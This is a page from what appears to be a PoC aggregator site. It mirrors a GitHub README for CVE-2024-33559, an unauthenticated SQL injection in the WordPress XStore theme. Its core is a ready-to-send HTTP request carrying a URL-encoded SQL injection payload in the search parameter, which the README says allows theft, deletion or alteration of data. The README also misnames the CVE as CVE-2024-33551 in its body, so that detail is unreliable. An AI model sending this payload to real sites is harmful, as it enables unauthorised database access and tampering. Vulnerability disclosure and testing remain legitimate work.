CVE-2024-33559 PoC — WordPress XStore theme <= 9.3.5 - Unauthenticated SQL Injection vulnerability

Source

https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection

Associated Vulnerability

Title:WordPress XStore theme <= 9.3.5 - Unauthenticated SQL Injection vulnerability (CVE-2024-33559)
Description:Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore allows SQL Injection.This issue affects XStore: from n/a through 9.3.5.

Description

(CVE-2024-33559) The XStore theme for WordPress is vulnerable to SQL Injection  due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query

Readme

# WordPress-XStore-theme-SQL-Injection

## CVE-2024-33559 XStore theme-SQL Injection

CVE-2024-33551 is a SQL injection vulnerability found in 8theme XStore, an ecommerce platform built on WordPress. This vulnerability allows attackers to execute malicious SQL commands on the database, which can lead to data theft, deletion, or even alteration.

### Poc
```
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1
```

File Snapshot


 [4.0K]  /data/pocs/e22cf6d217ebcf3a764d04a2fe118e070353f0b1
└── [ 819]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!